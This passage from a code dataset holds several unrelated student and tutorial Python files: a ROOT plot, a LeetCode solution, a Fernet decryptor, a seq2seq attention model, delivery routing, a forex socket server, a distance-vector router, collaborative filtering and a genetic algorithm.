chain.Draw(\"energy_TAC_PIN1_I2N:energy_TAC_I2N_I2S>>pid(500,2000,7000,500,6000,14000)\",\"\",\"colz\")\n c1.SetTitle(\"Particle ID for 5 consecutive runs\")\n \n c1.SaveAs(\"c1.png\")\n# c1.SaveAs(\"c1.png\")\n t = chain.GetTree()\n\n \ndef main():\n\n chain_runs()\n print(\"hello world\")\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"py/pid.py","file_name":"pid.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"204324509","text":"from collections import Counter\n\n\nclass Solution:\n def checkInclusion(self, s1: str, s2: str) -> bool:\n\n cntr, n = Counter(s1), len(s1)\n for r in range(len(s2)):\n cntr[s2[r]] -= 1\n if r >= n:\n cntr[s2[r - n]] += 1\n if all([cntr[i] == 0 for i in cntr]):\n return True\n return False\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"126689008","text":"from cryptography.fernet import Fernet\n\ndef decrypte_file(file):\n with open(\"./key.txt\") as f:\n key = f.read()\n cypher = Fernet(key) #Cria a cifra Fernet\n with open(file,'rb') as f: #Abre o ficheiro a ser desencriptado\n decrypted_file = cypher.decrypt(f.read()) #desencripta a mensagem\n ffile = file[:-10] #remove o .encrypted\n with open(ffile + '.decrypted', 'wb') as f: #abre o ficheiro.decrypted\n f.write(decrypted_file) #escreve a mensagem desencriptada\n\ndef main():\n decrypte_file(\"./mensagem.encrypted\") #Desencripta a mensagem\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Guioes/G1/NovaVersão/Decrypt.py","file_name":"Decrypt.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"427834462","text":"import torch\nimport torch.nn as nn\nfrom torch import optim\nimport torch.nn.functional as F\nimport random\nimport numpy as np \n\nclass encoder(nn.Module):\n def __init__(self, input_dim, emb_dim, enc_hid_dim, dec_hid_dim, dropout):\n super().__init__()\n\n self.input_dim = input_dim\n self.emb_dim = emb_dim\n self.enc_hid_dim = enc_hid_dim\n self.dec_hid_dim = dec_hid_dim\n self.dropout = dropout\n\n self.embedding = nn.Embedding(input_dim, emb_dim)\n self.rnn = nn.GRU(emb_dim,enc_hid_dim,bidirectional = True)\n self.fc = nn.Linear(enc_hid_dim * 2,dec_hid_dim)\n\n self.dropout = nn.Dropout(dropout)\n \n def forward(self,src, src_len):\n\n #src = [len(src sentence), batch_size]\n #src_len = [len(src sentence)]\n\n embedded = self.dropout(self.embedding(src))\n #embedded = [len(src sentence), batch_size, emb_dim]\n\n packed_embedded = nn.utils.rnn.pack_padded_sequence(embedded, src_len)\n packed_outputs, hidden = self.rnn(packed_embedded)\n\n outputs, _ = nn.utils.rnn.pad_packed_sequence(packed_outputs) \n #outputs = [len(sentence), batch_size, hid_dim * num_directions]\n #hidden = [n_layers * num_directions, batch_size, hid_dim]\n\n #if bidirectional, hidden is stacked [forward_1, backward_1, forward_2, backward_2, ...]\n #outputs are always from the last layer\n #hidden [-2, :, : ] is the last of the forwards RNN \n #hidden [-1, :, : ] is the last of the backwards RNN\n\n hidden = torch.tanh(self.fc(torch.cat((hidden[-2,:,:], hidden[-1,:,:]), dim=1)))\n #outputs = [len(sentence), batch_size, enc_hid_dim * 2]\n #hidden = [batch_size, dec_hid_dim]\n\n return outputs, hidden\n\nclass attention(nn.Module):\n def __init__(self, enc_hid_dim, 
dec_hid_dim):\n super().__init__()\n\n self.enc_hid_dim = enc_hid_dim\n self.dec_hid_dim = dec_hid_dim\n\n self.attn = nn.Linear((enc_hid_dim * 2) + dec_hid_dim, dec_hid_dim)\n self.v = nn.Parameter(torch.rand(dec_hid_dim))\n\n def forward(self, hidden, encoder_outputs, mask):\n #hidden = [batch_size, dec_hid_dim]\n #encoder_outputs = [len(src sentence), batch_size, enc_hid_dim * 2]\n #mask = [batch_size, len(src sentence)]\n\n batch_size = encoder_outputs.shape[1]\n src_len = encoder_outputs.shape[0]\n\n hidden = hidden.unsqueeze(1).repeat(1, src_len, 1)\n encoder_outputs = encoder_outputs.permute(1, 0, 2)\n\n #hidden = [batch_size, len(src sentence), dec_hid_dim]\n #encoder_outputs = [batch_size, len(src sentence), enc_hid_dim * 2]\n\n energy = torch.tanh(self.attn(torch.cat((hidden, encoder_outputs), dim=2)))\n energy = energy.permute(0, 2, 1)\n #energy = [batch_size, dec_hid_dim, len(src sentence)]\n #v = [dec_hid_dim]\n\n v = self.v.repeat(batch_size, 1).unsqueeze(1)\n #v = [batch_size, 1, dec_hid_dim]\n\n attention = torch.bmm(v, energy).squeeze(1)\n #attention = [batch_size, len(src sentence)]\n\n attention = attention.masked_fill(mask == 0, -1e10)\n\n return F.softmax(attention, dim=1)\n\nclass decoder(nn.Module):\n def __init__(self, output_dim, emb_dim, enc_hid_dim, dec_hid_dim, dropout, attention):\n super().__init__()\n\n self.emb_dim = emb_dim\n self.enc_hid_dim = enc_hid_dim\n self.dec_hid_dim = dec_hid_dim\n self.output_dim = output_dim\n self.dropout = dropout\n self.attention = attention\n \n self.embedding = nn.Embedding(output_dim, emb_dim)\n self.rnn = nn.GRU((enc_hid_dim * 2) + emb_dim, dec_hid_dim)\n self.out = nn.Linear((enc_hid_dim * 2) + dec_hid_dim + emb_dim, output_dim)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, input, hidden, encoder_outputs, mask):\n #input = [batch_size]\n #hidden = [batch_size, dec_hid_dim]\n #encoder_outputs = [len(src sentence), batch_size, enc_hid_dim * 2]\n #mask = [batch_size, len(src sentence)]\n\n input = input.unsqueeze(0)\n #input = [1, batch_size]\n\n embedded = self.dropout(self.embedding(input))\n #embedded = [1, batch_size, emb_dim]\n\n a = self.attention(hidden, encoder_outputs, mask)\n #a = [batch_size, len(src sentence)]\n\n a = a.unsqueeze(1)\n #a = [batch_size, 1, len(src sentence)]\n\n encoder_outputs = encoder_outputs.permute(1, 0, 2)\n #encoder_outputs = [batch_size, len(src sentence), enc_hid_dim * 2]\n\n weighted = torch.bmm(a, encoder_outputs)\n #weighted = [batch_size, 1, enc_hid_dim * 2]\n\n weighted = weighted.permute(1, 0, 2)\n #weighted = [1, batch_size, enc_hid_dim * 2]\n\n rnn_input = torch.cat((embedded, weighted), dim=2)\n #rnn_input = [1, batch_size, (enc_hid_dim * 2) + emb_dim]\n\n output, hidden = self.rnn(rnn_input, hidden.unsqueeze(0))\n #output = [len(sentence), batch_size, dec_hid_dim * n_directions]\n #hidden = [n_layers * n_directions, batch_size, dec_hid_dim]\n\n assert (output == hidden).all(), print(output.shape, hidden.shape, output[0,0,:25], hidden[0,0,:25])\n\n embedded = embedded.squeeze(0)\n output = output.squeeze(0)\n weighted = weighted.squeeze(0)\n output = self.out(torch.cat((output, weighted, embedded), dim=1))\n #output = [batch_size, output_dim]\n\n return output, hidden.squeeze(0), a.squeeze(1)\n\nclass seq2seq(nn.Module):\n def __init__(self, encoder, decoder,pad_idx, sos_idx, eos_idx, device):\n super().__init__()\n\n self.encoder = encoder\n self.decoder = decoder\n self.pad_idx = pad_idx\n self.sos_idx = sos_idx\n self.eos_idx = eos_idx\n self.device = device\n\n 
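# create_mask flags the non-padding positions of the source batch as a\n    # [batch_size, src_len] boolean tensor; the attention module later fills\n    # masked positions with -1e10 before the softmax so <pad> tokens get no weight.\n    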
def create_mask(self, src):\n        mask = (src != self.pad_idx).permute(1, 0)\n        return mask\n\n    def forward(self, src, src_len, trg, teacher_forcing_ratio = 0.5):\n        #src = [len(src sentence), batch_size]\n        #src_len = [batch_size]\n        #trg = [len(trg sentence), batch_size]\n\n        if trg is None:\n            inference = True\n            assert teacher_forcing_ratio == 0, \"Must be zero during inference\"\n            trg = torch.zeros((100, src.shape[1]), dtype=torch.long).fill_(self.sos_idx).to(src.device)\n        else:\n            inference = False\n\n        batch_size = src.shape[1]\n        max_len = trg.shape[0]\n        trg_vocab_size = self.decoder.output_dim\n\n        outputs = torch.zeros(max_len, batch_size, trg_vocab_size).to(self.device)\n\n        attentions = torch.zeros(max_len, batch_size, src.shape[0]).to(self.device)\n\n        encoder_outputs, hidden = self.encoder(src, src_len)\n\n        output = trg[0,:]\n        mask = self.create_mask(src)\n        #mask = [batch_size, len(src sentence)]\n\n        for t in range(1, max_len):\n            output, hidden, attention = self.decoder(output, hidden, encoder_outputs, mask)\n            outputs[t] = output\n            attentions[t] = attention\n            teacher_force = random.random() < teacher_forcing_ratio\n            top1 = output.max(1)[1]\n            output = (trg[t] if teacher_force else top1)\n            if inference and output.item() == self.eos_idx:\n                return outputs[:t], attentions[:t]\n        \n        return outputs, attentions","sub_path":"seq2seq_attGRU.py","file_name":"seq2seq_attGRU.py","file_ext":"py","file_size_in_byte":7344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"200732243","text":"# vars to store sorted delivery trucks\n\nfirst_deliv_sorted = []\nfirst_deliv_sorted_idx = []\n\nsecond_deliv_sorted = []\nsecond_deliv_sorted_idx = []\n\nthird_deliv_sorted = []\nthird_deliv_sorted_idx = []\n\n# gets called in calc_dist module\n# calls find_min_dist to find the minimum travel distance for a delivery truck\ndef fastest_route(delivery_list, delivery_num, current_loc, csv_address_data):\n    if (len(delivery_list) == 0):\n        return delivery_list\n    else:\n        try:\n            min_dist = 20.0\n            new_loc = 0\n            curr_dist = 0\n            find_min_dist(delivery_list,\n                          delivery_num,\n                          current_loc,\n                          csv_address_data,\n                          min_dist,\n                          new_loc,\n                          curr_dist)\n        except IndexError:\n            pass\n\n# greedy algorithm O(N)\n# 2 loops each taking O(n) thus O(2N) = O(N)\n\n# the first loop gets back the distance between two packages\n# and compares it with min_dist, which is initially set to 20;\n# that address location is then stored in new_loc.\n# the second loop again loops through delivery_list\n# and calls sort_delivery() to add the new package info to\n# a sorted list and store its index, and pops the minimum\n# distance from the original delivery_list,\n# updates the current location,\n# and calls the parent func fastest_route again recursively\n\n\ndef find_min_dist(delivery_list,\n                  delivery_num,\n                  current_loc,\n                  csv_address_data,\n                  min_dist,\n                  new_loc,\n                  curr_dist):\n    for i in range(len(delivery_list)): # O(N)\n        temp = find_current_dist_val(current_loc,\n                                     delivery_list[i].address_location,\n                                     csv_address_data)\n        if temp <= min_dist:\n            min_dist = temp\n            new_loc = delivery_list[i].address_location\n    for i in range(len(delivery_list)): # O(N)\n        temp = find_current_dist_val(current_loc,\n                                     delivery_list[i].address_location,\n                                     csv_address_data)\n        if (temp == min_dist):\n            if (delivery_num == \"first\"):\n                sort_delivery(delivery_list, i, current_loc, new_loc, csv_address_data,\n                              first_deliv_sorted, first_deliv_sorted_idx, \"first\")\n            elif (delivery_num == \"second\"):\n                sort_delivery(delivery_list, i, current_loc, 
new_loc, csv_address_data,\n second_deliv_sorted, second_deliv_sorted_idx, \"second\")\n elif (delivery_num == \"third\"):\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n sort_delivery(delivery_list, i, current_loc, new_loc, csv_address_data,\n third_deliv_sorted, third_deliv_sorted_idx, \"third\")\n\ndef sort_delivery(delivery_list, i, current_loc, new_loc, csv_address_data,\n sorted_list, sorted_list_idx, msg):\n sorted_list.append(delivery_list[i])\n sorted_list_idx.append(delivery_list[i].address_location)\n delivery_list.pop(delivery_list.index(delivery_list[i]))\n current_loc = new_loc\n fastest_route(delivery_list, msg, current_loc, csv_address_data)\n\n# finds distance value by getting data from csv_address_data\ndef find_current_dist_val(row, col, csv_address_data):\n curr_dist = csv_address_data[row][col]\n if curr_dist == '':\n curr_dist = csv_address_data[col][row]\n return float(curr_dist)","sub_path":"algo.py","file_name":"algo.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"462425473","text":"import socket\nimport json\nfrom threading import Thread\nfrom logger import is_logged, is_sign_up\nfrom tkinter import *\nfrom get_data_web import setData\nPORT = 5455\nHOST = \"0.0.0.0\"\n# ThreadCount = 0 \n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind((HOST, PORT))\n# ==================GUI-SERVER-MAIN=============\nwindow = Tk()\nwindow.geometry(\"350x400\")\nwindow.title(\"Forex Rate\")\nicon = PhotoImage(file='1855847.png')\nwindow.iconphoto(True, icon)\n# ====logo=====\nframe_logo_root = Frame(window, bg = \"white\", bd = 5)\nframe_logo_root.place(x = 0, y = 0, height = 150, width = 250)\nlogo_root = Label(frame_logo_root, text = \"FOREX RATE\", font =(\"Impact\", 30, \"bold\"), fg = \"#D2691E\")\nlogo_root.place(x = 15, y = 10)\n# ====scroll-bar====\nscroll_bar = Scrollbar(window)\nscroll_bar.pack(side = RIGHT, fill = Y )\n# ====status-main===\nstatus = Listbox(window, width = 32, height = 15, yscrollcommand = scroll_bar.set)\nstatus.place(x = 25, y = 70)\nstatus.insert(END, \"Waiting for client...\")\n# ====scroll-bar-command====\nscroll_bar.config(command = status.yview)\n\n\ndef Handle_client(conn, addr):\n # log\n while True:\n while True:\n client_select = conn.recv(1024).decode(\"utf-8\")\n user_json = conn.recv(1024).decode(\"utf-8\")\n user = json.loads(user_json)\n is_success = False\n if client_select == \"login\":\n # login\n if is_logged(user):\n print(\"{} logged!\".format(user[\"name\"]))\n status.insert(END,\"{} logged!\".format(user[\"name\"]))\n conn.sendall(\"login_success\".encode(\"utf-8\"))\n is_success = True\n else:\n conn.sendall(\"login_fail\".encode(\"utf-8\"))\n elif client_select == \"sign_up\":\n # regis\n if is_sign_up(user):\n print(\"{} signed up!\".format(user[\"name\"]))\n status.insert(END,\"{} signed up!\".format(user[\"name\"]))\n conn.sendall(\"sign_up_success\".encode(\"utf-8\"))\n else:\n conn.sendall(\"sign_up_fail\".encode(\"utf-8\"))\n if is_success == True:\n break\n \n clients[user[\"name\"]] = conn\n # run\n while True:\n data_client_json = clients[user[\"name\"]].recv(1024).decode(\"utf-8\")\n data_client = json.loads(data_client_json)\n if data_client[\"msg\"] == \"quit\":\n status.insert(END, \"{} logged out\".format(data_client[\"name\"]))\n break\n # response\n if data_client[\"msg\"] == \"GET\": \n print(\"{} request {}\".format(data_client[\"name\"], data_client[\"msg\"]))\n status.insert(END, \"{} request 
{}\".format(data_client[\"name\"], data_client[\"msg\"]))\n # do something\n # sendall setData\n clients[user[\"name\"]].sendall(json.dumps(setData).encode(\"utf-8\"))\n # if data_server == \"quit\":\n # conn.close()\n\n\ndef Accept_connection():\n while True:\n conn, addr = server.accept()\n print(f\"connected by {addr}\")\n status.insert(END,f\"connected by {addr}\")\n # clients.append(conn)\n # start_new_thread(handle_client, (conn,addr))\n # ThreadCount += 1\n conn.sendall(f\"Server: Welcome {addr}\".encode(\"utf-8\"))\n Thread(target=Handle_client, args=(conn, addr)).start()\n\n\nif __name__ == \"__main__\":\n # ...the same as hash table\n clients = {}\n server.listen(6)\n ACCEPT_THREAD = Thread(target=Accept_connection)\n ACCEPT_THREAD.start()\n # window.protocol(\"WM_DELETE_WINDOW\", on_closing)\n window.mainloop()\n ACCEPT_THREAD.join()\n server.close()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"563500597","text":"# --------------------------------------------------------------------------- #\n# ---------------------- Engenharia de Sistemas - UFMG ---------------------- #\n# ----------------------- DCC023 - Redes de Computadores -------------------- #\n# --------------------- Prof. Ítalo Fernando Scota Cunha -------------------- #\n# ------------------------ Trabalho Prático II - DCCRIP --------------------- #\n# ----------- Alunos : Humberto Monteiro Fialho (2013430811) ------------ #\n# -------------------- Rafael Carneiro de Castro (2013030210) ------------ #\n# --------------------------------------------------------------------------- #\n\nimport sys\nimport json\nimport copy\nimport threading\nimport socket as sck\nfrom random import randint\n\nMAX_PAYLOAD_SIZE = 65536\nMAX_HISTORY_VERSION = 10000\n\n\n# method to call function every 'secs' seconds\ndef set_interval(func, secs):\n def function_wrapper():\n func()\n set_interval(func, secs)\n t = threading.Timer(secs, function_wrapper)\n t.start()\n return t\n\n\nclass Router:\n neighbors = []\n routing = []\n history = []\n\n def __init__(self, ip, period):\n self.ip = ip\n self.port = 55151\n self.period = period\n this_routing = dict()\n this_routing['ip'] = ip\n this_routing['distance'] = 0\n this_routing['next'] = ip\n this_routing['ttl'] = 4\n self.history.append(this_routing)\n self.history_version = 0\n self.routing_version = 0\n self.routing = dict()\n self.update_routing_table()\n\n def add_neighbor(self, neighbor_ip, neighbor_weight):\n new_neighbor = dict()\n new_neighbor['ip'] = neighbor_ip\n new_neighbor['weight'] = int(neighbor_weight)\n self.neighbors.append(new_neighbor)\n new_route = dict()\n new_route['ip'] = new_neighbor['ip']\n new_route['distance'] = new_neighbor['weight']\n new_route['next'] = new_neighbor['ip']\n new_route['ttl'] = 4\n self.history.append(new_route)\n self.history_version = self.history_version + 1\n\n def remove_neighbor(self, neighbor_ip):\n to_remove = list(filter(lambda neighbor: neighbor['ip'] == neighbor_ip, self.neighbors))\n if len(to_remove) > 0:\n learned_from_neighbor = list(filter(lambda option: option['next'] == neighbor_ip, self.history))\n\n # remove routes learned from that neighbor\n if len(learned_from_neighbor) > 0:\n for route in learned_from_neighbor:\n self.history.remove(route)\n\n # update history version\n self.history_version = self.history_version + 1\n\n # remove neighbor\n 
self.neighbors.remove(to_remove[0])\n\n def send_update(self):\n routing_table = self.get_routing_table()\n\n update_message = dict()\n update_message['type'] = 'update'\n update_message['source'] = self.ip\n update_message['destination'] = ''\n update_message['distances'] = dict()\n\n for ip in routing_table.keys():\n update_message['distances'][ip] = routing_table[ip][0]['distance']\n\n connection = sck.socket(sck.AF_INET, sck.SOCK_DGRAM)\n for neighbor in self.neighbors:\n # copy message to use original in other neighbor messages\n copy_message = copy.deepcopy(update_message)\n copy_message['destination'] = neighbor['ip']\n\n # by split horizon, remove route to destination of message\n if neighbor['ip'] in copy_message['distances'].keys():\n del copy_message['distances'][neighbor['ip']]\n\n # by split horizon, remove route learned from destination of message\n to_remove = []\n for ip in routing_table.keys():\n learned_from_destination = list(filter(lambda option: option['next'] == neighbor['ip'],\n routing_table[ip]))\n if len(learned_from_destination) > 0 and ip in copy_message['distances'].keys():\n to_remove.append(ip)\n for ip in to_remove:\n copy_message['distances'].pop(ip)\n\n # all routers have the same port\n connection.sendto(json.dumps(copy_message).encode(), (neighbor['ip'], self.port))\n\n def get_routing_table(self):\n # updating routing on-demand\n if self.routing_version < self.history_version:\n # update old routing table\n self.update_routing_table()\n return self.routing\n\n def update_routing_table(self):\n # get the best options of routes for each IP\n # each one can have more than one route with the same distance (load balancing)\n routes_by_ip = dict()\n for history in self.history:\n ip_key = history['ip']\n if ip_key not in routes_by_ip.keys() or routes_by_ip[ip_key][0]['distance'] > history['distance']:\n # if there isn't a route for that IP on the routing table,\n # or the new history has a better distance, update de routing entry\n routes_by_ip[ip_key] = [history]\n elif routes_by_ip[ip_key][0]['distance'] == history['distance']:\n # if already exists a route for that IP with that distance, add new option\n routes_by_ip[ip_key].append(history)\n\n self.routing_version = self.history_version\n self.routing = routes_by_ip\n\n def subtract_ttl(self, source_ip):\n to_remove = []\n # subtract TTL from routes learned from source\n for route in self.history:\n if route['next'] == source_ip:\n route['ttl'] = route['ttl'] - 1\n if route['ttl'] == 0:\n to_remove.append(route)\n\n # remove routes with TTL equals to 0\n for zero_ttl in to_remove:\n self.history.remove(zero_ttl)\n\n def receive_table_info(self, table_info):\n # find neighbor who sent that information\n source = list(filter(lambda neighbor: neighbor['ip'] == table_info['source'], self.neighbors))\n if len(source) == 0 or table_info['destination'] != self.ip:\n # leave if it's from unknown source or another destination\n return\n source = source[0]\n\n self.subtract_ttl(source['ip'])\n\n for ip in table_info['distances'].keys():\n # update the history with the route for that IP by that source\n on_history = list(filter(lambda route: route['ip'] == ip and route['next'] == table_info['source'],\n self.history))\n # there should only exists one history for that IP by that source\n if len(on_history) > 0:\n # there is a history for that IP by that source, just update distance and TTL\n on_history[0]['distance'] = table_info['distances'][ip] + source['weight']\n on_history[0]['ttl'] = 4\n else:\n # there isn't a 
history for that IP by that source, add new\n                new_history = dict()\n                new_history['ip'] = ip\n                new_history['distance'] = table_info['distances'][ip] + source['weight']\n                new_history['next'] = table_info['source']\n                new_history['ttl'] = 4\n                self.history.append(new_history)\n\n        # adding history version to update routing on-demand\n        self.history_version = self.history_version + 1\n        if self.history_version > MAX_HISTORY_VERSION:\n            self.history_version = 0\n        self.update_routing_table()\n\n    def receive_trace(self, message):\n        # first of all, add this IP to hops\n        message['hops'].append(self.ip)\n\n        if message['destination'] != self.ip:\n            # this isn't the final destination, send to next hop with load balance\n            self.send_message(message)\n        else:\n            # this is the final destination, respond with the trace result\n            self.send_data(message['source'], json.dumps(message))\n\n    def receive_data(self, message):\n        if message['destination'] == self.ip:\n            # print payload if the destination is that router\n            print(message['payload'])\n        else:\n            # send to next hop with load balance\n            self.send_message(message)\n\n    def send_trace(self, final_ip):\n        trace_message = dict()\n        trace_message['type'] = 'trace'\n        trace_message['source'] = self.ip\n        trace_message['destination'] = final_ip\n        trace_message['hops'] = [self.ip]\n\n        # send message with load balance\n        self.send_message(trace_message)\n\n    def send_data(self, destination, payload):\n        data_message = dict()\n        data_message['type'] = 'data'\n        data_message['source'] = self.ip\n        data_message['destination'] = destination\n        data_message['payload'] = payload\n\n        # send message with load balance\n        self.send_message(data_message)\n\n    def send_message(self, message):\n        routing_table = self.get_routing_table()\n\n        if message['destination'] in routing_table.keys():\n            # select one of the best options for load balancing\n            options = routing_table[message['destination']]\n            selected_option = randint(0, len(options) - 1)\n            selected_hop = options[selected_option]['next']\n\n            connection = sck.socket(sck.AF_INET, sck.SOCK_DGRAM)\n            # all routers have the same port\n            connection.sendto(json.dumps(message).encode(), (selected_hop, self.port))\n\n\nrouter = None\n\n\ndef start_router(address, update_period, startup_commands):\n    global router\n    router = Router(address, update_period)\n\n    socket = sck.socket(sck.AF_INET, sck.SOCK_DGRAM)\n    socket.setsockopt(sck.SOL_SOCKET, sck.SO_REUSEADDR, 1)\n    socket.bind((router.ip, router.port))\n\n    # read commands from file\n    if startup_commands:\n        read_command_file(startup_commands)\n\n    # read commands from terminal\n    read_thread = threading.Thread(target=read_commands, args=())\n    read_thread.start()\n\n    # receive data from routers\n    read_thread = threading.Thread(target=receive_data, args=(socket,))\n    read_thread.start()\n\n    # send update message to neighbors\n    set_interval(router.send_update, router.period)\n\n\ndef read_command_file(file_name):\n    with open(file_name, 'r') as file:\n        line = file.readline()\n        while line:\n            if line != '\\n':\n                read_command(line)\n            line = file.readline()\n\n\ndef read_commands():\n    while True:\n        read = input()\n        read_command(read)\n\n\ndef read_command(read_line):\n    global router\n\n    read_line = read_line.split()\n    if read_line[0] == 'add':\n        router.add_neighbor(read_line[1], read_line[2])\n    elif read_line[0] == 'del':\n        router.remove_neighbor(read_line[1])\n    elif read_line[0] == 'trace':\n        router.send_trace(read_line[1])\n\n\ndef receive_data(connection):\n    global router\n\n    while True:\n        
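# each UDP datagram carries one complete JSON message; dispatch on its 'type' field\n        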
data = json.loads(connection.recv(MAX_PAYLOAD_SIZE))\n\n        if data['type'] == 'update':\n            router.receive_table_info(data)\n        elif data['type'] == 'trace':\n            router.receive_trace(data)\n        elif data['type'] == 'data':\n            router.receive_data(data)\n\n\n# main: calling functions to receive inputs\ndef main():\n    address = None\n    update_period = None\n    startup_commands = None\n\n    if len(sys.argv) < 5:\n        address = sys.argv[1]\n        update_period = sys.argv[2]\n        if len(sys.argv) > 3:\n            startup_commands = sys.argv[3]\n    else:\n        if '--addr' in sys.argv:\n            address = sys.argv[sys.argv.index('--addr') + 1]\n        if '--update-period' in sys.argv:\n            update_period = sys.argv[sys.argv.index('--update-period') + 1]\n        if '--startup-commands' in sys.argv:\n            startup_commands = sys.argv[sys.argv.index('--startup-commands') + 1]\n\n    start_router(address, int(update_period), startup_commands)\n\n    return\n\n\n# --------------------------------------------------------------------------- #\n# calling main function\nif __name__ == '__main__':\n    main()\n","sub_path":"tp2/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":12205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"119794004","text":"import pandas as pd\nimport xlrd\nimport math\nimport csv\n\nclass colaborative_filtering():\n    def colab_filtering(self): \n        \"\"\"\n        - This function calculates the missing values (ratings) used for\n          recommendation in a particular user's data.\n        - Missing values are here denoted by the rating 99.\n        - First, the data file is opened along with the similarity matrix\n          file (computed earlier).\n        - All users who are similar to the ith user, i.e. similarity(i,j) > 0,\n          are taken into consideration to calculate the missing rating of a user.\n        \"\"\" \n        path = './dataset/'\n        filename = 'similarity5000.csv'\n        with open(path+filename, 'r') as f:\n            reader = csv.reader(f)\n            your_list = list(reader)\n\n        sim = []\n        for i in range(len(your_list)):\n            sim.append([])\n            for j in range(len(your_list[i])):\n                if your_list[i][j]=='':\n                    pass\n                else:\n                    sim[i].append(float(your_list[i][j]))\n\n        filename2 = '5000dataset3.xlsx'\n\n        xlsfile = xlrd.open_workbook(path+filename2, on_demand= True)\n        xlsfiledata = xlsfile.sheet_by_index(0)\n\n        data=[]\n        for i in range(0,100):\n            data.append([])\n            for j in range(0,5000):\n                data[i].append(xlsfiledata.cell(i,j).value)\n\n        #print(data[0])\n\n        colab_fil = []\n        for i in range(0,100):\n            colab_fil.append([])\n            print(i)\n            for j in range(0,5000):\n                if data[i][j]==99:\n                    sum1=0\n                    sum2=0\n                    for k in range(0,100):\n                        if k==i:\n                            pass\n                        else:\n                            if i<k and sim[i][k-i]>0 and data[k][j]!=99:\n                                sum1 = sum1 + (float(data[k][j])*float(sim[i][k-i]))\n                                sum2 = sum2 + float(sim[i][k-i])\n                            elif i>k and sim[i-k][k]>0 and data[k][j]!=99:\n                                sum1 = sum1 + (float(data[k][j])*float(sim[i-k][k]))\n                                sum2 = sum2 + float(sim[i-k][k])\n\n                    value = (sum1/sum2) if sum2!=0 else 0\n                    colab_fil[i].append(value)\n                    #data[i][j]=value\n                else:\n                    colab_fil[i].append(data[i][j])\n\n        my_df = pd.DataFrame(colab_fil)\n        my_df.to_csv(path+'colab5000.csv',index=False,header=False)\n\nif __name__=='__main__':\n    cf = colaborative_filtering()\n    cf.colab_filtering()\n","sub_path":"colab_filtering.py","file_name":"colab_filtering.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"448971422","text":"__author__ = 'ARturo'\n## TUTORIAL from http://lethain.com/genetic-algorithms-cool-name-damn-simple/\n# genetic algorithm to find combinations of 5 numbers which sum to 200\n\n
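# rough outline: population() seeds random candidates, fitness() scores each\n# one by its distance to the target sum, and evolve() keeps the fittest,\n# mutates a few survivors, and breeds children by splicing parent halves\n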
from functools import reduce\nfrom random import randint\n\ndef individual(length, min, max):\n    'Create a member of the population'\n    return [randint(min, max) for x in range(length)]\n\ndef population(count, length, min, max):\n    \"\"\"\n    Create a number of individuals (i.e. a population)\n    :param count: size of population\n    :param length: size of each individual\n    :param min: minimum for each of the values in the individual's list\n    :param max: maximum for each of the values in the individual's list\n    :return: a list of individuals\n    \"\"\"\n\n    return [individual(length, min, max) for x in range(count)]\n\nfrom operator import add\n\ndef fitness(individual, target):\n    \"\"\"\n    Define how good an individual is. The lower, the better.\n\n    :param individual: individual we are evaluating\n    :param target: the sum we are aiming for\n    :return: distance to target\n    \"\"\"\n\n    sum = reduce(add, individual, 0)\n    return abs(target-sum)\n\ndef grade(pop, target):\n    'Average fitness for a population'\n    summed = reduce(add, (fitness(x, target) for x in pop), 0)\n    return summed / (len(pop) * 1.0)\n\nfrom random import random\n\ndef evolve(pop, target, retain = 0.2, random_select = 0.05, mutate = 0.01):\n    graded = [(fitness(x, target), x) for x in pop] # individuals paired with their fitness\n    graded = [x[1] for x in sorted(graded)] # only individuals, ordered by fitness\n    retain_length = int(len(pop) * retain)\n    parents = graded[: retain_length] # the parents are the best 20 percent\n\n    # randomly add other individuals to promote genetic diversity\n    for individual in graded[retain_length:]:\n        if random_select > random():\n            parents.append(individual)\n\n    # mutate some individuals\n    for individual in parents:\n        if mutate > random():\n            pos_to_mutate = randint(0, len(individual)-1)\n            # this mutation is not ideal, because it\n            # restricts the range of possible values,\n            # but the function is unaware of the min/max\n            # values used to create the individuals,\n            individual[pos_to_mutate] = randint(\n                min(individual), max(individual))\n\n    # crossover parents to create children\n    parents_length = len(parents)\n    desired_length = len(pop) - parents_length\n    children = []\n    while len(children) < desired_length:\n        male = randint(0, parents_length-1)\n        female = randint(0, parents_length-1)\n        if male != female:\n            male = parents[male]\n            female = parents[female]\n            half = len(male) // 2\n            child = male[:half] + female[half:]\n            children.append(child)\n\n    parents.extend(children)\n    return parents\n","sub_path":"PythonicGenericAlgorithm/genetic.py","file_name":"genetic.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
